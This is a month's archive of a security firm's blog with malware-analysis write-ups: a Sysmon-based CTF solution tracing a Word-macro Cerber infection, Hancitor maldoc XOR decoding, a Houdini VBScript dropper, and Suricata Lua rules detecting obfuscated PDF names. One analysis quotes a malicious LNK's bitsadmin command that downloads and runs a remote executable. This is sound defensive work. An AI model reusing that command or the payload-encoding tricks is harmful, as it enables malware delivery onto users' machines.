Monthly Archives: March 2017

CSCBE Challenge Write-up – Trace Me

This is the first post in a series of write-ups on some of the challenges that were tackled by students during our Cyber Security Challenge Belgium this month.


All challenges of the Cyber Security Challenge Belgium are created by security professionals from many different organisations. The TraceMe challenge in particular was created by Vasileios Friligkos, one of our distinguished challenge contributors.

The challenge

At your day job, per your recommendation and after many requests, you recently activated host based monitoring using Sysmon.

Perfect! You are now going to have a visibility on each host of your IT system giving you perfect awareness and detection capabilities that will be able to thwart even the most persistent attackers…
Before you can finish your thoughts, you get interrupted by a phone call:
“Steve”, (yes, this is you) says an irritated voice on the other side of the line.
– “Yes…”, replies Steve (yep, still you).
“Your awesome monitoring system did not work, we got an infection.”
– “But there are no detection rules implemented yet, it’s normal that we didn’t… “, you start explaining when you get interrupted.
“At least, tell me you can identify how the infection occurred!”
Eh, yes sure I can…

And by that, the irritated voice (who by the way is your boss) hangs up and sends you one file with the Sysmon log data of the infected host.

Can you identify the benign (non malicious) process that was abused and was ultimately responsible for the infection?
Can you also identify the IP from where the second stage was downloaded (the first connection made by the malware)?

If so, you will be able to save your reputation and also get the points for this challenge by submitting the SHA1 of the abused, benign process (Uppercase) + the IP where the second stage is hosted.

Good luck Steve!

The solution

Evtx is the Windows event file format which makes sense since Sysmon writes to the “Applications and Services Logs/Microsoft/Windows/Sysmon/Operational” event folder as indicated here:

There are many ways to start interacting with these events, there is even an official Windows log parser that can query event log data.
If we go this way, we have to download the LogParser and run the following command to extract all logs in csv format:

$> LogParser.exe -i:EVT -o:csv "SELECT * from sysmon.evtx" > sysmon.csv

This gives us a .csv file with 3.021 log lines of different sizes and types.
By checking the description of Sysmon on the MS site we see that the following types of events can be logged:

  • Event ID 1: Process creation
  • Event ID 2: A process changed a file creation time
  • Event ID 3: Network connection
  • Event ID 4: Sysmon service state changed
  • Event ID 5: Process terminated
  • Event ID 6: Driver loaded
  • Event ID 7: Image loaded
  • Event ID 8: CreateRemoteThread
  • Event ID 9: RawAccessRead
  • Event ID 10: ProcessAccess
  • Event ID 11: FileCreate
  • Event ID 12: RegistryEvent (Object create and delete)
  • Event ID 13: RegistryEvent (Value Set)
  • Event ID 14: RegistryEvent (Key and Value Rename)
  • Event ID 15: FileCreateStreamHash
  • Event ID 255: Error

Ok, many interesting events that we could use. In the file, we see that we have events of the following types 1, 2, 3, 5 and 6.
Since we do not have any initial information to start investigating and then pivot until the initial infection, we need to search for abnormal or at least unusual behaviour.

For example, we see that we have only one event ID 6 but by investigating the name of the driver and its SHA we realise that it concerns a legitimate driver.

Since there are not so many logs, we could use excel to try and make some sense by colouring for example the log lines based on the event id.

If we zoom out and simply scroll over the logs, we see that there is a very important network activity at some moment:


By simply investigating, we see that there are many UDP requests to port 6892 by a “roaming.exe” process found in “C:\Users\TestPC\AppData\” and with destination adjacent IPs in the same subnet:


This looks surely suspicious and we could take this lead for our investigation but let’s say that we don’t go this way (Steve doesn’t like excel) and we prefer to put our ninja awk skills into use!

Some parsing is necessary since the comma is a field separator but also found inside the fields and there is much useless information that we can dump.
In this case, let’s choose to substitute the field separator by the pipe ( “|” ) in order to be able to use awk easily, let’s also separate the process creation events (event id 1 – file sysmon_process_creation.csv) and the connections events (event id 3 – file sysmon_connections.csv).

For process creation, we keep the following fields:


Let’s filter the data and search for some unusual execution locations or uncommon process names:

awk -F "|" '{ print "Process:"$3 }' sysmon_process_creation.csv | sort | uniq -c | sort -rn


We see two executables from the %AppData% directory:

  • “Roaming.ExE”
  • “OneDrive.exe”

We can pull their SHA1’s and check online whether they are legitimate. Doing so does not reveal clearly if any of them is malicious.

If we try to see the parent processes:

  • “Roaming.ExE” -> powershell and roaming.exe
  • “OneDrive.exe” -> explorer

Hmm, powershell could be something worth investigating, let’s show also the parent process full command:


Ok, this surely looks bad: powershell launched a hidden download of an executable which was also executed at the end of the command.
So, at last, we have our investigation lead: roaming.exe

For information, we could have used the connections log file to help us spot outliers.
By sorting and counting unique occurrences (similar as for process creation logs) of processes and target IPs we do not have a clear result because we have too many chrome.exe processes reaching to multiple IPs

awk -F "|" '{ printf "Process: %-90s DST:%s:%s\n",$3,$13,$15 }' sysmon_connections.csv | sort | uniq -c | sort -rn


But if we ignore the destination IP and focus only on the destination port, then we should have a clearer view:

awk -F "|" '{ printf "Process: %-90s DST_Port:%s\n",$3,$15 }' sysmon_connections.csv | sort | uniq -c | sort -rn


Roaming.exe communicated 1.088 times over port 6892 (on UDP) which when looking online directly leads to Cerber malware.

In both cases, we have roaming.exe which looks malicious and by following its parent process PID we can trace the activities and the initial infection:

  • Roaming.exe PID: 1868 was created by powershell.exe PID: 2076
  • Powershell.exe PID: 2096 was created by cmd.exe PID: 2152

(We notice that there are two processes with the same PID: 2152 – “cmd.exe” and “Acrobat Reader DC\Reader\reader_sl.exe”; keep in mind that PID’s can be reused)

  • Cmd.exe PID: 2152 was created by winword.exe PID: 2232

The parent of winword.exe is explorer.exe which is legitimate and therefore, we can deduce that winword.exe was abused (probably by a macro) and resulted in executing a cmd.exe command that launched a powershell command to fetch the second stage malware (probably cerber according to OSINT).

Therefore, the first part to the solution is the SHA1 of winword.exe:

  • CE3538D04AB531F0526C4C6B1917A7BE6FF59938

For the second part, we need to identify the IP of the site from which the second stage was downloaded.
From the powershell command we know that the URL is: footarepu[.]top but instead of resolving the domain name (since it might have changed since the infection), we can find the IP in the sysmon_connections.csv since we have the PID and process name of all the connections.
Searching for powershell.exe PID: 2076 we find one contacted IP over port 80:


which is the second part of the solution.

Flag: CE3538D04AB531F0526C4C6B1917A7BE6FF59938_35.165.86.173

Good job Steve!

New Hancitor maldocs keep on coming…

Didier Stevens will provide NVISO training on malicious documents at Brucon Spring: Malicious Documents for Blue and Red Teams.

For more than half a year now we see malicious Office documents delivering Hancitor malware via a combination of VBA, shellcode and embedded executable. The VBA code decodes and executes the shellcode, the shellcode hunts for the embedded executable, decodes and executes it.

From the beginning, the embedded executable was encoded with a bit more complexity than a simple XOR operation. Here in the shellcode we see that the embedded executable is decoded by adding 3 to each byte and XORing with 17. Then base64 decoding and the EXE is decoded.


The gang behind Hancitor steadily delivered new maldocs, without changing much to this encoding method. Until about 2 months ago we started to see samples where the XOR key was a WORD (2 bytes) instead of a single byte.

Recently we received a sample that changed the encoding of the embedded executable again. This sample still uses macros, shellcode and an embedded executable:


The encoded shellcode is still in a form (stream 16), and the embedded executable is still in data (stream 5), appended after a PNG image:


If we look at the embedded executable, we see that the pattern has changed: in the beginning, we see a pattern of 4 repeating bytes. This is a strong indication that the group started to adopt a DWORD (4 bytes) key:


We can try to recover the xor key by performing a known plaintext attack: up til now, the embedded executables were base64 encoded and started with TVqQAA… Let’s use xor-kpa to try to recover the key:


We still find no key after trying out all add values between 1 and 16. Could it be that this time, it is just XOR encoded without addition? Let’s try:


Indeed! The key is xP4?.

We can now decode and extract the embedded executable:





The gang behind Hancitor has been creating complex malicious document to deliver their malware, and we constantly have to keep up our analysis techniques.

.LNK downloader and bitsadmin.exe in malicious Office document

We received a malicious office document (529581c1418fceda983336b002297a8e) that tricks the user into clicking on an embedded LNK file which in its turn uses the Microsoft Background Intelligent Transfer Service (BITS) to download a malicious binary from the internet.

The following Word document (in Japanese) claims to be an invoice, the user must click the Word icon to generate the amount to be paid.


When using to analyze this Word document we get the following output:

Screen Shot 2017-03-23 at 18.26.36

As you can see, in stream 8 an embedded OLE object is present. Using the following command we can obtain information on what this embedded OLE object exactly is: -s 8 -i ./document_669883.doc

Screen Shot 2017-03-23 at 18.28.14

The embedded object is thus an LNK file, we can then use the following command to get a hexdump on what this LNK file actually contains: -s 8 ./document_669883.doc

Screen Shot 2017-03-23 at 18.32.19

When going through this hexdump we can spot the intentions of this LNK file:

Screen Shot 2017-03-23 at 18.32.59

Now, to make this a bit easier to read we can use the following command: -s 8 -d document_669883.doc

Which provides the following output:

clean output.png

Opening the LNK file will execute the following command:

C:\Windows\System32\cmd.exe %windir% /c explorer.exe & bitsadmin.exe /transfer /priority high hxxp://av.ka289cisce[.]org/rh72.bin %AppData%\file.exe & %AppData%\file.exe

When looking at the timestamps of the Word document, we noticed that the file was last saved on 2017-03-22 19:20:00. The first sighting of this file on VirusTotal was already at 2017-03-22 23:15:59 UTC, less than 4 hour after it was last saved. This could explain why the link containing the binary file was no longer active at the time of our analysis (12 hours after first sighting on VirusTotal).

If you want to check if your organisation has been impacted by a similar document, you can detect the malicious downloads by looking through your proxy logs and searching for the following user agent: “Microsoft BITS/*”. While there are multiple software packages that use the BITS.EXE to download updates, these are currently still pretty limited, filtering for unique destination hosts will limit your dataset significantly enough for you to be able to spot the outlier(s) easily.

Developing complex Suricata rules with Lua – part 2

In part 1 we showed a Lua program to have Suricata detect PDF documents with obfuscated /JavaScript names. In this second part we provide some tips to streamline the development of such programs.

When it comes to developing Lua programs, Suricata is not the best development environment. The “write code & test”-cycle with Suricata can be quite tedious. One of the reasons is that it takes time. It can take 1 minute or more to start Suricata with the new rule, and have it process a test pcap file. And if there are errors in your Lua script, Suricata will not be of much help to identify and fix these errors.

Inspired by Emerging Threats Lua scripts, we adopted the following development method:

Test the script with a standalone Lua interpreter, and move to Suricata for the final tests.

This is one of the reasons why, in part 1, we put the logic of our test in function PDFCheckName which takes a string as input and is called by the match function. By doing this, we can also call (and test) the function from other functions with a standalone Lua interpreter as shown below:

function Test()
    print(PDFCheckName("testing !!!", true))
    print(PDFCheckName("testing /JavaScript and more /J#61vaScript !!!", true))
    print(PDFCheckName("testing /JavaScript and !!!", true))
    print(PDFCheckName("testing /J#61vaScript !!!", true))

This Test function calls PDFCheckName with different strings as input. We also added extra print statements to the function (see complete source code below), which are activated by the second argument of function PDFCheckName. This boolean argument, bVerbose, adds verbosity to our function when the argument is true.

We can load the Lua program in a Lua interpreter, and then call function Test. One way to do this is type command “lua -i PDFCheckName.lua”, and then type Test() at the Lua prompt. This can all be scripted in a single command like this:

echo Test() ¦ lua -i PDFCheckName.lua

With the following result:


This “code & run”-cycle is faster than using Suricata, and can be more verbose. Of course, you can also do this with an IDE like Eclipse.

We also added a function TestFile that reads a file (the PDFs we want to test), and then calls PDFCheckName with the content of the PDF file as the argument:


This produces the following output:


Being able to test a PDF file directly is also a big advantage, compared to having to create a PCAP file with a http request downloading the PDF file to test.


By using functions and a standalone Lua interpreter, we can significantly improve the development process of Lua programs for Suricata.


-- 2017/02/20

-- echo Test() | lua53.exe -i test.lua
-- echo TestFile() | lua53.exe -i test.lua javascript.pdf

tBlacklisted = {["/JavaScript"] = true}

function PDFCheckName(sInput, bVerbose)
    if bVerbose then
        print('sInput: ' .. sInput)
    for sMatchedName in sInput:gmatch("/[a-zA-Z0-9_#]+") do
        if bVerbose then
            print('sMatchedName: ' .. sMatchedName)
        if sMatchedName:find("#") then
            local sNormalizedName = sMatchedName:gsub("#[a-fA-F0-9][a-fA-F0-9]", function(hex) return string.char(tonumber(hex:sub(2), 16)) end)
            if bVerbose then
                print('sNormalizedName: ' .. sNormalizedName)
            if tBlacklisted[sNormalizedName] then
                if bVerbose then
                return 1
    if bVerbose then
        print('Not blacklisted!')
    return 0

function init(args)
    return {["http.response_body"] = tostring(true)}

function match(args)
    return PDFCheckName(tostring(args["http.response_body"]), false)

function Test()
    print(PDFCheckName("testing !!!", true))
    print(PDFCheckName("testing /JavaScript and more /J#61vaScript !!!", true))
    print(PDFCheckName("testing /JavaScript and !!!", true))
    print(PDFCheckName("testing /J#61vaScript !!!", true))

function TestFile()
    local file =[1])
    print(PDFCheckName(file:read("*all"), true))

Developing complex Suricata rules with Lua – part 1

The Suricata detection engine supports rules written in the embeddable scripting language Lua. In this post we give a PoC Lua script to detect PDF documents with name obfuscation.

One of the elements that make up a PDF, is a name. A name is a reserved word that starts with character / followed by alphanumerical characters. Example: /JavaScript. The presence of the name /JavaScript is an indication that the PDF contains scripts (written in JavaScript).

The PDF specification allows for the substitution of alphanumerical characters in a name by an hexadecimal representation: /J#61vaScript. #61 is the hexadecimal representation of letter a. We call the use of this hexadecimal representation in names “name obfuscation”, because it is a simple technique to evade detection by engines that just look for the normal, unobfuscated name (/JavaScript).

There is no limit to the number of characters in a name that can be replaced by their hexadecimal representation. That makes it impossible to write a Suricata/Snort rule (using content, pcre, …) that will detect all possible obfuscations of the name /JavaScript. However it is easy to write a program that normalizes obfuscated names (pdfid does this for example).

Fortunately Suricata supports the programming language Lua for some time now. Let’s take a look how we can use this to detect PDF files that contain the obfuscated name /JavaScript (FYI: all PDF files we observed with obfuscated /JavaScript name were malicious, so it’s a good test to detect malicious PDFs).

A Suricata Lua script has to implement 2 functions: init and match.

The init function declares the data we need from Suricata to be able to do our analysis. For the PDF document, we need the HTTP response body:

function init(args)
    return {["http.response_body"] = tostring(true)}

The match function needs to contain the actual logic to analyze the payload. We need to retrieve the HTTP response body, analyze it, and return 1 if we detect something. When nothing is detected, we need to return 0.

In this example of the match function, we detect if the HTTP response body is equal to string test:

function match(args)
    a = tostring(args["http.response_body"])
    if a == "test" then
        return 1
        return 0

To detect obfuscated /JavaScript names we use this code:

tBlacklisted = {["/JavaScript"] = true}

function PDFCheckName(sInput)
    for sMatchedName in sInput:gmatch("/[a-zA-Z0-9_#]+") do
        if sMatchedName:find("#") then
            local sNormalizedName = sMatchedName:gsub("#[a-fA-F0-9][a-fA-F0-9]", function(hex) return string.char(tonumber(hex:sub(2), 16)) end)
            if tBlacklisted[sNormalizedName] then
                return 1
    return 0

Function PDFCheckName takes a string as input (sInput) and then starts to search for names in the input:


For each name we find, we check if it contains a # character (e.g. if it could be obfuscated):

if sMatchedName:find("#") then

When this is the case, we try to normalize the name (replace #hexadecimal with corresponding ANSI code):

local sNormalizedName = sMatchedName:gsub("#[a-fA-F0-9][a-fA-F0-9]", function(hex) return string.char(tonumber(hex:sub(2), 16)) end)

And finally, we check if the normalized name is in our blacklist:

if tBlacklisted[sNormalizedName] then
    return 1

In that case we return 1. And otherwise we return 0.

The complete Lua script:

tBlacklisted = {["/JavaScript"] = true}

function PDFCheckName(sInput)
    for sMatchedName in sInput:gmatch"/[a-zA-Z0-9_#]+" do
        if sMatchedName:find("#") then
            local sNormalizedName = sMatchedName:gsub("#[a-fA-F0-9][a-fA-F0-9]", function(hex) return string.char(tonumber(hex:sub(2), 16)) end)
            if tBlacklisted[sNormalizedName] then
                return 1
    return 0

function init(args)
    return {["http.response_body"] = tostring(true)}

function match(args)
    return PDFCheckName(tostring(args["http.response_body"]))

To get Suricata to run our Lua script, we need to copy it in the rules directory and add a rule to call the script, like this:

alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"NVISO PDF file lua"; flow:established,to_client; luajit:pdfcheckname.lua; classtype:policy-violation; sid:1000000; rev:1;)

Rule option luajit allows us to specify the Lua script we want to execute (pdfcheckname.lua).

That’s all there is to do to get this running.

But on production systems, we will quickly get into trouble because of performance issues. The rule that we wrote will get the Lua script to execute on all HTTP traffic with incoming data. To avoid this, it is best to add pre-conditions to the rule so that the program will only run on downloaded PDF files:

alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"NVISO PDF file lua"; flow:established,to_client; file_data; content:"%PDF-"; within:5; luajit:pdfcheckname.lua; classtype:policy-violation; sid:1000000; rev:1;)

This updated rule checks that the file starts with %PDF- (that’s an easy trick to detect a PDF file, but be aware that there are ways to bypass this simple detection).

For some environments, checking all downloaded PDF files might still cause performance problems. This updated rule uses a regular expression to check if the downloaded PDF file contains a (potentially) obfuscated name:

alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"NVISO PDF file lua"; flow:established,to_client; file_data; content:"%PDF-"; within:5; pcre:"/\/.{0,10}#[a-f0-9][a-f0-9]/i"; luajit:pdfcheckname.lua; classtype:policy-violation; sid:1000000; rev:1;)

Note that in the regular expression of this rule we expect that the name is not longer than 11 characters (that’s the case with the name we want to detect, /JavaScript). So if you add your own names to the blacklist, and they are longer than 11 characters, then update the regular expression in the rule.


Support for Lua in Suricata makes it possible to develop complex analysis methods that would not be possible with simple rules, however performance needs to be taken into account.

In part 2 of this blog post, we will provide some tips to help with the development and testing of Lua scripts for Suricata.

Analyzing obfuscated scripts using nothing but a text editor

In this blog post, we will perform an analysis on some obfuscated scripts that we received. These files were already detected by automated scanners but as these are mainly malware droppers, we figured it could be interesting to do some manual analysis to determine where the actual malware is hosted.

The first sample we will investigate is a .wsf file. This type of file is a Windows script file and can contain various scripting languages. In this case, we’re dealing with an obfuscated VBScript.


Due to the obfuscation, it’s impossible to see on first sight what this script is trying to accomplish. We could run it in a virtual machine and dynamically monitor actions taken by the script such as network connections or processes started, but first we’d like to have an idea of the code.

Some script code structures that are interesting to look for are functions that execute commands, such as:

  • Execute
  • Eval
  • ExecuteGlobal
  • Exec

In the script above, we can identify some “eval” statements and “executeglobal”. When the script is started, it will first run “InItIalIZe()”, followed by “ExecGlOBal()”. Let’s take a look at the contents of the Initialize function.


The first statement assigns a large encoded string to a parameter. Not much we can do there. The second statement performs a split on the encoded string using “chr(EvAl(31080/740))”. If you calculate 31080/740 from the top of your head, you get 42. Unsurprisingly, using “chr()”, this is translated to “*”, which is used as the splitting character in the obfuscated string. Don’t panic.

In the next step, a loop runs through all the integers from the string above, translates them to characters and appends them to one large string. This string is then passed as the parameter to the “ExecuteGlobal” command.


We can piggyback on the deobfuscation that the malicious script is already performing by itself. Instead of letting it execute the deobfuscated code in the “ExecuteGlobal” command, we replace this command by something that will print the parameter to output. For Windows scripting, we can do this using “Wscript.echo”.


Using a command prompt and the “wscript” command, we can run the modified script. Our printing command shows us the decoded output in a pop-up window, which is too small to contain the entire code:


Copy pasting the entire text is not feasible either. Luckily, there’s an alternative: “cscript”. Using “csript file.wsf > deobfuscated.txt” we can print the deobfuscated string to a new file.

The result is similar to what we started with. We will follow the same approach again and replace the “execute” with a new printing statement and save the script as .vbs. Alternatively, we could surround the script with a “” and “// <![CDATA[
” tag and specify the scripting language in the “” tag. Then we could save and run the script as .wsf, similarly to the original script.


Now we get something that is actually readable. Nice! On first sight, we can see the script runs some persistence commands, including: writing the script to startup folders and adding some registry keys. This is interesting but these are not the juicy details we were looking for. We’ve added the persistence code below, along with the relevant parameters.


What follows is a loop that looks a lot more interesting. We can see that it makes a POST call using host and port parameters that are defined at the start of the script. The user-agent is set using pre-defined parameters as well (client & auth). This might allow the malware authors to determine what version of their malware is trying to communicate back to them. This is also a reason why user-agent string monitoring can be interesting for security analysts. Anomalies such as these can easily be detected.


Based on the result of this POST call, the script continues its execution through one of three functions. All of them make use of the function “D()”, that is defined a bit further in the code, presumably for deobfuscation of the POST response. The two quotes functions seem to be unused (for now).


If we want to further analyse this script, we need to have a response from the command and control server. The time to actually run the script has come!

Running the script

When executing the script and sniffing the traffic using Wireshark, we can see the POST call flying by, containing the user-agent set by the script. The response is another encoded string, prefixed with “s0”. We can use Wireshark’s “Export Objects” functionality to extract the response. If we go back to the script, we can see a case statement for this string. Looks like “Func0” will be executed on our newly obtained string! Time to let the script do the deobfuscation by replacing the execution command in “Func0” and pasting the obfuscated C&C response in our script! Note that we snipped most of the obfuscated string for the image below. Don’t forget to quit the loop or it’ll keep on running.


This final script we receive is not obfuscated at all. Looks like this malware is fingerprinting our computer. Adding an additional “echo” command would show us the information contained in the “ret” parameter. We can give you a small hint: it’s our computer and user name, OS, anti-virus,.. being sent through a POST call to the C&C. We have also observed this call in the traffic capture from before, so we could export the contents through Wireshark as well. There’s a sample of the AV fingerprinting code below.


Unfortunately, we won’t be able to figure out what the other functions (Func1 & Func2) do, since the command and control server did not send us any other command. Some possible causes could be that it decided our system is not interesting based on the information it received or it might just have been in an information gathering phase. If you want more information on this malware, look for Houdini!